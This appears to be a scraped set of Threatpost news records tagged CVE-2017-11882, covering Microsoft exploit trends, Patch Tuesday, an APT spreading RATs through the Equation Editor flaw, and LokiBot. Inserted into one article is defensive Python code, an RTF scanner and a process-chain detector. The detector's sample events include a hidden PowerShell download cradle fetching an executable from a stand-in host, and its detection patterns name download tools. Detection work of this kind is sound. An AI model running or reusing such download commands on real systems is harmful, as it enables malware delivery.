But until somebody goes through the effort to develop an exploit that leverages that vulnerability, the risk isn\u2019t actualized. The percentage of remote code execution vulnerabilities that are actually exploited is declining. The actual risk appears to be going down based on what we see,\u201d said Matt Miller, principal security software engineer in the Microsoft Security Response Center. \u201cThe absolute number of those bugs continues to decline, as well.\u201d\n\nRemote code execution vulnerabilities are attacker catnip, and that\u2019s especially true of RCE bugs in widely deployed software such as browsers and operating systems. For years, attackers had a field day with vulnerabilities in Internet Explorer and Windows, particularly buffer overflows. Rare was the Patch Tuesday that didn\u2019t include fixes for a buffer overflow or six. But Microsoft has put a lot of resources and effort into making those bugs more difficult to exploit, and Miller said the work has paid off.\n\nIn fact, he said the company didn\u2019t see a single stack corruption exploit in 2014.\n\n\u201cA couple of things have driven that. The Security Development Lifecycle has helped us eradicate these classes of bugs. And we\u2019ve driven mitigations and improvements that have helped too,\u201d Miller said. \u201cIn practice, this isn\u2019t a vulnerability class that people go after anymore.\u201d\n\nThose changes have forced the attacker community to shift gears. Miller said attackers have started targeting use-after-free vulnerabilities more often and have moved heavily into return-oriented programming, a technique that can be used to bypass exploit mitigations in software. 
At the same time, the rise of easily available exploit kits such as [Angler](<https://threatpost.com/domain-shadowing-latest-angler-exploit-kit-evasion-technique/111396>), [Blackhole](<https://threatpost.com/black-hole-exploit-kit-20-released-091212/77000>) and others have made it much simpler for attackers to go after new vulnerabilities. And the exploits are showing up in those kits much more quickly than ever before.\n\nDavid Weston, principal program manager on the Microsoft One Protection team, who spoke alongside Miller, said that as recently as the beginning of 2014 it was taking roughly 30 days for exploits for a newly patched vulnerability to show up in the common exploit kits. By the end of the year, it was within ten days of the patch. And now, not only are the kit developers adding exploits for known bugs, but they are in some cases putting in exploits for undisclosed vulnerabilities.\n\n\u201cBy the beginning of this year, we\u2019re seeing the primary exploit kit developers introducing zero days,\u201d Weston said. \u201cThe trickle-down effect is changing, as we\u2019re seeing many more of these crimeware kits source things for themselves. 
That\u2019s a dramatic change.\u201d\n", "cvss3": {}, "published": "2015-04-21T17:41:22", "type": "threatpost", "title": "Microsoft Data Shows Drop in Remote Code Execution Bugs Being Exploited", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-04-21T21:41:22", "id": "THREATPOST:AD3C2C361C6E263CA6B217D740D6C09F", "href": "https://threatpost.com/microsoft-data-shows-drop-in-remote-code-execution-bugs-being-exploited/112371/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:07", "description": "Scott Charney, the head of Microsoft\u2019s Trustworthy Computing efforts, said that he was the one who decided it was time to [move the TwC group in a new direction](<https://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>) and integrate the security functions more deeply into the company as a whole.\n\n\u201cI was the architect of these changes. This is not about the company\u2019s loss of focus or diminution of commitment. Rather, in my view, these changes are necessary if we are to advance the state of trust in computing,\u201d Charney, the corporate vice president of Trustworthy Computing at Microsoft, wrote in a blog post.\n\nThe Trustworthy Computing team was an outgrowth of the effort that Microsoft started in 2002 to build more secure software. Modest at first, the TwC group eventually grew into a large team of engineers, developers and executives and became one of the more influential groups in the company. 
Charney, a former Department of Justice lawyer who joined Microsoft just as the security push was getting off the ground in 2002, said that the move to disperse the TwC team into different groups and change the reporting structure would help the company react more quickly and be more efficient with security related decisions.\n\n\u201cBy consolidating work within the company, as well as altering some reporting structures, Microsoft will be able to make a number of trust-related decisions more quickly and execute plans with greater speed, whether the objective is to get innovations into the hands of our customers, improve our engineering systems, ensure compliance with legal or corporate policies, or engage with regulators around the world,\u201d Charney wrote in the [post](<http://blogs.microsoft.com/cybertrust/2014/09/22/looking-forward-trustworthy-computing/>).\n\nOne of the key functions of the TwC team over the years has been the development and implementation of the Security Development Lifecycle, the comprehensive development, engineering and deployment program that\u2019s meant to build security into the company\u2019s products from the beginning. Charney said that the SDL will remain the responsibility of the part of the TwC group that\u2019s moving to the Cloud and Enterprise Division.\n\n\u201cI will continue to lead the Trustworthy Computing team in our new home as part of the Cloud and Enterprise Division. Significantly, Trustworthy Computing will maintain our company-wide responsibility for centrally driven programs such as the Security Development Lifecycle (SDL) and Online Security Assurance (OSA). 
But this change will also allow us to embed ourselves more fully in the engineering division most responsible for the future of cloud and security, while increasing the impact of our critical work on privacy issues by integrating those functions directly into the appropriate engineering and legal policy organizations,\u201d Charney said.\n\nThe change to the TwC group became public last week as the company was in the process of laying off 2,100 employees as part of a series of internal changes.\n", "cvss3": {}, "published": "2014-09-23T08:53:50", "type": "threatpost", "title": "Charney on Trustworthy Computing: 'I Was the Architect of These Changes'", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-25T18:08:18", "id": "THREATPOST:04738138B50414CEACDB62EFA6D61789", "href": "https://threatpost.com/charney-on-trustworthy-computing-i-was-the-architect-of-these-changes/108455/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-10-20T13:38:19", "description": "An APT described as a \u201clone wolf\u201d is exploiting a decades-old Microsoft Office flaw to deliver a barrage of commodity RATs to organizations in India and Afghanistan, researchers have found.\n\nAttackers use political and government-themed malicious domains as lures in the campaign, which targets Windows and Android endpoints with out-of-the-box RATs such as dcRAT and [QuasarRAT](<https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/>) for Windows and AndroidRAT for mobile devices. They\u2019re delivering the RATs in malicious documents by exploiting [CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2017-11882>), according to a [report published Tuesday](<https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) by Cisco Talos. 
\n\nThe threat group \u2013 tracked by Cisco Talos from the beginning of the year through the summer \u2013 disguises itself behind a front that seems legitimate, posing as a Pakistani IT firm called Bunse Technologies, researchers said.\n\nCVE-2017-11882 is a memory corruption vulnerability in the Equation Editor component (EQNEDT32.EXE) of Microsoft Office. The component dates from 2000, and the flaw went unpatched for 17 years until the company [patched it](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) in November 2017; Microsoft removed Equation Editor from Office altogether in January 2018, so the exploit only works against installations that never received those updates. Attackers were still exploiting the bug [as recently as two years ago](<https://threatpost.com/microsoft-arbitrary-code-execution-old-bug/145527/>): once the victim opens the document, the exploit runs attacker code with no further interaction, and no macros need to be enabled.\n\nThe advanced persistent threat (APT) behind the campaign also uses a custom file enumerator and infector in the reconnaissance phase of the two-step attack, followed by a second phase added in later versions of the campaign that deploys the ultimate RAT payload, researchers said.\n\nTo host the malware payloads, the threat actor registered multiple domains with political and government themes used to fool victims, particularly ones linked to diplomatic and humanitarian efforts in Afghanistan to target entities in that country, researchers said.\n\n\u201cThis campaign is a classic example of an individual threat actor employing political, humanitarian and diplomatic themes in a campaign to deliver commodity malware to victims\u201d \u2013 in this case, RATs \u201cpacked with multiple functionalities to achieve complete control over the victim\u2019s endpoint,\u201d Cisco Talos\u2019 Asheer Malhotra wrote in the post. 
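The campaigns on this page, including Royal Road, this Talos case and the LokiBot RTF lures CISA describes further down, all start with an RTF that embeds an Equation Editor object. As an added example, not code from Threatpost, Cisco Talos, Cybereason or CISA, the Python below statically triages an RTF before it reaches a user: it walks each `{\object ...}` group, reads the declared `\*\objclass`, hex-decodes `\*\objdata` and parses the OLE1 wrapper to recover the embedded class name and native payload, then flags the Equation Editor ProgID or CLSID, the `\objupdate` control word (which makes Word activate the object as soon as the file opens, so the victim never has to click it), a mismatch between declared and embedded class, and native data that is not a compound file. The CLSID {0002CE02-0000-0000-C000-000000000046} is Equation Editor 3.0's registered identifier; the sample RTF, the OLE1 wrapper and the native bytes are constructed here for the test and are not indicators from any of the campaigns. Both the declared and the embedded class are checked because weaponizers routinely mangle one of them.

```python
"""Static triage of RTF files for embedded Equation Editor objects (CVE-2017-11882 lures)."""
import binascii
import re
import struct

# CLSID of Equation Editor 3.0, {0002CE02-0000-0000-C000-000000000046}, in the
# little-endian layout it has inside a compound-file directory entry.
EQNEDT_CLSID = bytes.fromhex("02CE020000000000C000000000000046")
CFB_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")        # compound file (OLE2) signature

def _group_end(data: bytes, start: int) -> int:
    """Index just past the '}' that closes the RTF group opening at data[start]."""
    depth, i = 0, start
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":            # skip an escaped brace or the first letter of a control word
            i += 2
            continue
        if c == b"{":
            depth += 1
        elif c == b"}":
            depth -= 1
            if depth == 0:
                return i + 1
        i += 1
    return len(data)

def _parse_ole1(blob: bytes):
    """OLE1 wrapper: version, format id, 3 length-prefixed ANSI strings, native size, native data."""
    try:
        pos, names = 8, []
        for _ in range(3):
            (ln,) = struct.unpack_from("<I", blob, pos)
            names.append(blob[pos + 4:pos + 4 + ln].rstrip(b"\x00"))
            pos += 4 + ln
        (size,) = struct.unpack_from("<I", blob, pos)
        return {"class_name": names[0], "native": blob[pos + 4:pos + 4 + size]}
    except struct.error:
        return None

def scan_rtf(data: bytes) -> list:
    """One finding per embedded object; 'flags' lists what makes it worth a second look."""
    findings = []
    for m in re.finditer(rb"\{\\object\b", data):
        obj = data[m.start():_group_end(data, m.start())]
        f = {"offset": m.start(), "declared_class": "", "embedded_class": "", "flags": []}
        cls = re.search(rb"\{\\\*\\objclass\s*([^}]*)\}", obj)
        declared = cls.group(1).strip() if cls else b""
        f["declared_class"] = declared.decode("latin-1")
        if b"equation" in declared.lower():
            f["flags"].append("equation_class_declared")
        if re.search(rb"\\objupdate\b", obj):      # Word activates the object as soon as the file opens
            f["flags"].append("objupdate")
        d = re.search(rb"\{\\\*\\objdata", obj)
        if d:
            body = obj[d.end():_group_end(obj, d.start()) - 1]
            body = re.sub(rb"\\[A-Za-z]+-?\d*|[{}]", b"", body)   # drop control words and braces
            hexchars = re.sub(rb"[^0-9A-Fa-f]", b"", body)
            hdr = _parse_ole1(binascii.unhexlify(hexchars[:len(hexchars) & ~1]))
            if hdr is None:
                f["flags"].append("unparseable_ole1")
            else:
                f["embedded_class"] = hdr["class_name"].decode("latin-1")
                if b"equation" in hdr["class_name"].lower():
                    f["flags"].append("equation_class_embedded")
                if declared and hdr["class_name"] and declared.lower() != hdr["class_name"].lower():
                    f["flags"].append("class_mismatch")        # declared and embedded class disagree
                if not hdr["native"].startswith(CFB_MAGIC):
                    f["flags"].append("non_cfb_native_data")
                if EQNEDT_CLSID in hdr["native"]:
                    f["flags"].append("eqnedt_clsid")
        findings.append(f)
    return findings

def is_suspicious(finding: dict) -> bool:
    """Any Equation Editor object is reason enough to hold the file; the other flags add confidence."""
    return bool({"equation_class_declared", "equation_class_embedded", "eqnedt_clsid"} & set(finding["flags"]))

def make_ole1(class_name: bytes, native: bytes) -> bytes:
    """Constructed OLE1 wrapper around a constructed native stream (not a real compound file)."""
    def lp(s: bytes) -> bytes:
        return struct.pack("<I", len(s) + 1) + s + b"\x00" if s else struct.pack("<I", 0)
    return struct.pack("<II", 0x501, 2) + lp(class_name) + lp(b"") + lp(b"") + struct.pack("<I", len(native)) + native

def _hex_lines(blob: bytes) -> bytes:
    h = binascii.hexlify(blob)
    return b"\n".join(h[i:i + 64] for i in range(0, len(h), 64))

# Constructed sample: a memo carrying a case-mangled Equation.3 object with the Equation Editor
# CLSID and \objupdate, followed by an ordinary embedded Word document object.
SAMPLE_RTF = (
    b"{\\rtf1\\ansi\\deff0{\\fonttbl{\\f0 Arial;}}\\pard Meeting agenda attached.\\par\n"
    b"{\\object\\objemb\\objupdate{\\*\\objclass eQuAtIoN.3}{\\*\\objdata\n"
    + _hex_lines(make_ole1(b"Equation.3", CFB_MAGIC + b"\x00" * 8 + EQNEDT_CLSID + b"\x00" * 8))
    + b"\n}}\\par\n{\\object\\objemb{\\*\\objclass Word.Document.8}{\\*\\objdata\n"
    + _hex_lines(make_ole1(b"Word.Document.8", CFB_MAGIC + b"\x00" * 24))
    + b"\n}}\\par}"
)
```

A mail gateway can hold every file for which `is_suspicious()` is true: Equation Editor has been gone from Office since January 2018, so a business document that still depends on it is rare, while `objupdate` plus a `class_mismatch` has no benign explanation. The scanner deliberately does not open the compound file itself; a full MTEF parse of the `Equation Native` stream would be the next step for an analyst who wants to confirm the overflow rather than just block the lure.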
\n\n## **Out-of-the-Box Benefits**\n\nThe campaign reflects an increased trend by both cybercriminals and APTs to use commodity RATs instead of custom malware against victims for a number of reasons, researchers said.\n\nUsing commodity RATs gives attackers a range of out-of-the-box functionality, including preliminary reconnaissance capabilities, arbitrary command execution and data exfiltration, researchers noted. The RATs also \u201cact as excellent launch pads for deploying additional malware against their victims,\u201d Malhotra wrote.\n\nUsing commodity malware also saves attackers both the time and resource investment in developing custom malware, as the RATs have stock features requiring minimal configuration changes, researchers said.\n\nIn their post, researchers broke down the two-stage attack process as well as the specifics of each RAT they observed attackers using in the campaign. RAT functionality varies depending on the payload, they said, but generally includes capabilities such as remote shells, process management, file management, keylogging, arbitrary command execution and credential stealing.\n\n## **Initial Infection and Reconnaissance**\n\nThe infection chain consists of a reconnaissance phase that starts with malicious RTF documents and PowerShell scripts that ultimately distribute malware to victims. \n\nSpecifically, the threat actor uses the RTF to exploit the Office bug and execute a malicious PowerShell command that extracts and executes the next-stage PowerShell script. That script then base64 decodes another payload \u2013 in the case researchers observed, it was a loader executable \u2013 and activates it on the infected endpoint, Malhotra wrote.\n\nThe loader executable begins by establishing persistence for itself using a shortcut in the current user\u2019s Startup directory and then compiles hardcoded C# code into an executable assembly. 
It then invokes the entry point for the compiled malicious code \u2013 the previously mentioned custom file enumerator and infector \u2013 researchers found.\n\nThis C# code \u2013 the final payload of the reconnaissance phase \u2013 contains two components: a file enumerator, which lists files of specific types on the endpoint and sends their paths to the command-and-control (C2) server, and file infector modules, which differ from the executable infectors usually seen in the wild, Malhotra noted.\n\n\u201cThese modules are used for infecting benign Office documents with malicious OLE objects to weaponize them to exploit CVE-2017-11882,\u201d he wrote.\n\n## **Attack Phase**\n\nResearchers observed attackers switching up tactics to deploy commodity RATs as the final payload starting in July, they said. \n\nTo do this, attackers tweaked the reconnaissance process slightly to leverage the second-stage PowerShell script to create a BAT file on disk, researchers said. That file, in turn, would execute another PowerShell command to download and activate the RAT payload on the infected endpoint, retrieving it from one of the sites attackers set up. 
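The chain described in the last few paragraphs (Equation Editor exploit, first-stage PowerShell, loader, Startup-folder shortcut, BAT file, second PowerShell that downloads the RAT) leaves a very recognisable process tree on the endpoint. As an added example that is not part of the Talos report or this article, the Python below runs four detection rules over Sysmon-style process-creation (EventID 1) and file-creation (EventID 11) records and attaches the reconstructed ancestry to each alert: Equation Editor spawning any child, PowerShell started with an encoded or download-cradle command line, PowerShell handing off to a .bat via cmd.exe, and a .lnk written into the user's Startup folder. The events, GUIDs, paths, file names, the first-stage command and the example.invalid host are all constructed for the test, not indicators from the campaign. One caveat the sample encodes: EQNEDT32.EXE is started by the DCOM launcher as an out-of-process COM server, so its parent is svchost.exe rather than WINWORD.EXE; the rule therefore keys on Equation Editor being the parent of anything, which it never legitimately is.

```python
"""Detection logic for the RTF -> Equation Editor -> PowerShell -> loader chain over Sysmon-style events."""
import base64
import json
import re

EQNEDT = "eqnedt32.exe"
STARTUP_DIR = "\\start menu\\programs\\startup\\"
PS_IMAGES = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b"
    r"|net\.webclient|start-bitstransfer|\bcurl\b|\bwget\b", re.I)

def _base(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline: str):
    """Decoded -EncodedCommand payload, or None. PowerShell accepts -e, -ec and any longer
    unambiguous prefix of the switch, so match the prefix rather than the full word."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        t = tok[1:].lower()
        if tok[:1] in "-/" and (t == "ec" or (t.startswith("e") and "encodedcommand".startswith(t))):
            try:
                return base64.b64decode(toks[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return toks[i + 1]          # malformed payload; the switch alone is still worth reporting
    return None

def _chain(ev: dict, by_guid: dict) -> str:
    """Ancestry as 'root > ... > process', following ParentProcessGuid while we have the events."""
    names, cur = [_base(ev["Image"])], ev
    for _ in range(8):
        parent = by_guid.get(cur.get("ParentProcessGuid"))
        if parent is None:
            names.append(_base(cur.get("ParentImage", "?")))
            break
        names.append(_base(parent["Image"]))
        cur = parent
    return " > ".join(reversed(names))

def detect(lines) -> list:
    """Run the rules over JSON event lines; EventID 1 = process create, 11 = file create."""
    events = [json.loads(line) for line in lines]
    by_guid = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    alerts = []

    def alert(rule, ev, detail):
        proc = by_guid.get(ev["ProcessGuid"], ev)
        alerts.append({"rule": rule, "chain": _chain(proc, by_guid), "detail": detail})

    for ev in events:
        if ev["EventID"] == 1:
            img, parent, cmd = _base(ev["Image"]), _base(ev.get("ParentImage", "")), ev.get("CommandLine", "")
            if parent == EQNEDT:                     # Equation Editor never legitimately spawns children
                alert("eqnedt32_child_process", ev, cmd)
            if img in PS_IMAGES:
                decoded = decode_encoded_command(cmd)
                if decoded is not None:
                    alert("powershell_encoded_command", ev, decoded)
                if DOWNLOAD_RE.search(cmd):
                    alert("powershell_download_cradle", ev, cmd)
            if img == "cmd.exe" and parent in PS_IMAGES and re.search(r"\.(bat|cmd)\b", cmd, re.I):
                alert("powershell_to_batch", ev, cmd)
        elif ev["EventID"] == 11:
            target = ev["TargetFilename"].lower()
            if STARTUP_DIR in target and target.endswith(".lnk"):
                alert("startup_shortcut_persistence", ev, ev["TargetFilename"])
    return alerts

def _proc(guid, parent_guid, image, parent_image, cmdline):
    return {"EventID": 1, "ProcessGuid": guid, "ParentProcessGuid": parent_guid,
            "Image": image, "ParentImage": parent_image, "CommandLine": cmdline}

def sample_events() -> list:
    """Constructed Sysmon-style events for the chain in the article; not real telemetry or IOCs."""
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    eq = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
    cmd = r"C:\Windows\System32\cmd.exe"
    loader = r"C:\Users\u\AppData\Roaming\svcupd.exe"
    stage1 = r"iex (gc $env:TEMP\s.ps1 -Raw)"           # constructed stand-in for the first-stage command
    b64 = base64.b64encode(stage1.encode("utf-16-le")).decode()
    events = [
        _proc("A", "X", r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE", r"C:\Windows\explorer.exe",
              r'"WINWORD.EXE" /n "C:\Users\u\Downloads\agenda.rtf"'),
        _proc("B", "S", eq, r"C:\Windows\System32\svchost.exe", '"EQNEDT32.EXE" -Embedding'),  # DCOM-launched
        _proc("C", "B", ps, eq, f"powershell -w hidden -enc {b64}"),
        _proc("D", "C", loader, ps, loader),
        {"EventID": 11, "ProcessGuid": "D", "Image": loader,
         "TargetFilename": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcupd.lnk"},
        _proc("E", "C", cmd, ps, r"cmd.exe /c C:\Users\u\AppData\Local\Temp\run.bat"),
        _proc("F", "E", ps, cmd,
              "powershell -w hidden -c \"(New-Object Net.WebClient).DownloadFile('http://example.invalid/up.exe', $env:TEMP + '\\up.exe')\""),
        _proc("G", "X", r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
    ]
    return [json.dumps(e) for e in events]
```

Run `detect(sample_events())` and the five alerts come back with chains such as `svchost.exe > eqnedt32.exe > powershell.exe > cmd.exe > powershell.exe`, which is the BAT hand-off from the article rendered as telemetry. The `eqnedt32_child_process` rule alone catches every stage that follows the exploit, regardless of which loader or RAT the actor swaps in; the other three are worth keeping because they also fire on the many campaigns that reach PowerShell through macros instead.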
\n\u201cSo far, we\u2019ve observed the delivery of three types of payloads from the remote locations discovered in this phase of the campaign: DcRAT, QuasarRAT and a legitimate copy of the remote desktop client AnyDesk,\u201d Malhotra wrote.\n\nThe use of the last payload \u201cindicates a focus on manual operations where the actor would have logged into the infected devices to discern if the access was of any value,\u201d according to the writeup.\n\nAll in all, the tactics of the APT used in the campaign demonstrate \u201caggressive proliferation\u201d as the goal, as the use of out-of-the-box malware combined with customized file infections gives them a straightforward point of entry onto a victim\u2019s network, Malhotra observed.\n\n\u201cOrganizations should remain vigilant against such threats that are highly motivated to proliferate using automated mechanisms,\u201d he wrote.\n\nHowever, it seems likely that the group will eventually abandon its use of commodity malware for its own bespoke tools, which means there will probably be more threat campaigns in its future, researchers said.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-20T13:28:13", "type": "threatpost", "title": "\u2018Lone Wolf\u2019 APT Uses Commodity RATs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, 
"userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2021-10-20T13:28:13", "id": "THREATPOST:BD9CDF08D7870033C1C564691CABFC16", "href": "https://threatpost.com/apt-commodity-rats-microsoft-bug/175601/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:57:36", "description": "Microsoft today pulled the plug on its Advanced Notification Service (ANS), offering it going forward only to paying Premier customers.\n\nANS preceded the release of Microsoft\u2019s monthly Patch Tuesday security bulletins; on the Thursday prior, Microsoft would provide users via its security website a high-level preview of how many bulletins could be expected on the ensuing Tuesday, and more importantly, the severity of the vulnerabilities scheduled to be patched. The advanced notification helped companies allocate resources in advance to patch prioritization and testing.\n\nMicrosoft, however, said today that the decade-old [ANS has outlived its usefulness](<http://blogs.technet.com/b/msrc/archive/2015/01/08/evolving-advance-notification-service-ans-in-2015.aspx>).\n\n\u201cANS has always been optimized for large organizations. However, customer feedback indicates that many of our large customers no longer use ANS in the same way they did in the past due to optimized testing and deployment methodologies,\u201d said Chris Betz of the Microsoft Security Resource Center. 
\u201cWhile some customers still rely on ANS, the vast majority waits for Update Tuesday, or take no action, allowing updates to occur automatically.\u201d\n\nBetz said Microsoft customers instead rely on Microsoft Update and Windows Server Update Service to assist with patch prioritization.\n\n\u201cCustomers are also moving to cloud-based systems which provide continuous updating,\u201d Betz said.\n\nThat rationalization isn\u2019t sitting well with some experts, who said the move is against the grain established by the Trustworthy Computing initiative, which not only revamped how Microsoft builds security in to its development lifecycle, but also gave birth to Patch Tuesday.\n\n\u201cThis is an assault on IT and IT security teams everywhere. Making this change without any lead up time is simply oblivious to the impact this will have in the real world,\u201d said Ross Barrett, senior manager of security engineering at Rapid7. \u201cMicrosoft is basically going back to a message of \u2018just blindly trust\u2019 that we will patch everything for you. Honestly, it\u2019s shocking.\u201d\n\nMicrosoft said it will provide ANS to its Premier customers through their Technical Account Manager support representatives; participants in Microsoft\u2019s MAPP partner program will also receive ANS notifications. In May, Microsoft made available its new [myBulletins service](<http://threatpost.com/microsoft-mybulletins-service-customizes-patch-details/106339>), which allows Windows admins to customize security patch information, filtering it by products in use inside an enterprise or midmarket company. 
Notifications and advisories were left out of myBulletins, to the chagrin of some.\n\n\u201cWith the advent of the famous TWC memo and years of work by MSRC to gain a solid working relationship within the security community, to suddenly switch a free and relied upon service to a fee based system will only backfire,\u201d said Andrew Storms, vice president of security services at New Context, a systems architecture firm in San Francisco. \u201cI can only imagine that since the forced retirement of so many MSRC folks in 2014, that Microsoft might be trying to make ends meet.\u201d\n\nMicrosoft in September announced it was [disbanding its Trustworthy Computing unit](<http://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>), the cornerstone of the Security Development Lifecycle born out of [Bill Gates\u2019 2002 memo](<http://www.computerbytesman.com/security/billsmemo.htm>). 
The decision coincided with the layoff of 2,100 employees and reshuffling of many TWC security people into the company\u2019s cloud and enterprise division, as well as Microsoft\u2019s legal group.\n\nMicrosoft was not clear on whether all of its advanced notifications will go away, including those for out-of-band patches.\n\n\u201cIf that\u2019s the case, then it will surely feel like Microsoft has stepped back in time by a decade or more,\u201d Storms said.\n", "cvss3": {}, "published": "2015-01-08T14:50:57", "type": "threatpost", "title": "Microsoft Shuts Down Patch Tuesday Advanced Notifications", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-01-12T20:44:11", "id": "THREATPOST:3283173A16F1E86892491D89F2E307C2", "href": "https://threatpost.com/microsoft-limits-advanced-patch-notifications-to-premier-customers/110294/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:54", "description": "Microsoft today provided its [Patch Tuesday advanced notification](<https://technet.microsoft.com/en-us/library/security/MS14-NOV>), giving IT managers a heads-up about 16 bulletins that are scheduled to be delivered next week, including five rated critical for remote code execution and privilege escalation issues.\n\nThe heavy patch load is an anomaly for 2014, which has been relatively quiet. The last time Microsoft released anything approaching this many bulletins in one month was in September 2013.\n\n\u201cNext week will tell us how many CVEs are involved but suffice to say, this patch load will be a big impact to the enterprise,\u201d said Russ Ernst, director at Lumension.\n\nExpect another cumulative critical patch rollup for Internet Explorer and four other critical bulletins for Windows. 
Nine of the remaining bulletins are rated Important by Microsoft and two others Moderate.\n\nOffice software is in the crosshairs of the moderate bulletins. Microsoft said bulletins are on the way for Office 2007 SP3, Microsoft Word Viewer and Office Compatibility Pack SP 3.\n\nMicrosoft is also expected to patch vulnerabilities in Exchange Server 2007, 2010 and 2013, as well as the .NET development framework. None of those are rated critical, likely meaning an attacker would require local access in order to exploit the security issues.\n", "cvss3": {}, "published": "2014-11-06T14:34:02", "type": "threatpost", "title": "November 2014 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-06T19:34:02", "id": "THREATPOST:C4DD63E36CE4313386CAB54222BDD07A", "href": "https://threatpost.com/microsoft-ready-with-16-patch-tuesday-bulletins-5-critical/109223/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:04", "description": "Microsoft has confirmed the reported [vulnerability in the WebDAV implementation in IIS 5.0, 5.1 and 6.0](<http://www.microsoft.com/technet/security/advisory/971492.mspx>), saying that the flaw could be used to bypass the authentication mechanism on the Web server. However, the company said that there are a number of mitigating factors involved and that company security officials have not seen any attacks against the weakness so far.\n\nMicrosoft officials said that the vulnerability is mitigated by several things, including the fact that WebDAV is not enabled by default on IIS 6.0. However, the WebDAV protocol is widely used to share documents and information on Web servers. 
Normally implemented access control lists (ACLs), which prevent users from accessing files that they do not have permission to access, also would limit the damage of an attack.\n\nThe company also said that the vulnerability affects versions 5.0 and 5.1 of IIS, along with 6.0, which was the version that had been reported to be vulnerable originally. The most effective workaround until a patch is available is to disable WebDAV.\n", "cvss3": {}, "published": "2009-05-19T13:59:37", "type": "threatpost", "title": "Microsoft confirms flaw in WebDAV in IIS", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:13", "id": "THREATPOST:FAE0DDDC6420E9881C1D719E13B77095", "href": "https://threatpost.com/microsoft-confirms-flaw-webdav-iis-051909/72674/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-09T22:13:17", "description": "The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning that the LokiBot info-stealing trojan is seeing a surge across the enterprise landscape.\n\nThe uptick started in July, according to the agency, and activity has remained \u201cpersistent\u201d ever since.\n\nLokiBot targets Windows and [Android endpoints](<https://threatpost.com/lokibot-redux-common-android-apps/157458/>), and spreads mainly through email (but also via malicious websites, texts and messaging). It typically goes after credentials (usernames, passwords, cryptocurrency wallets and more), as well as personal information. 
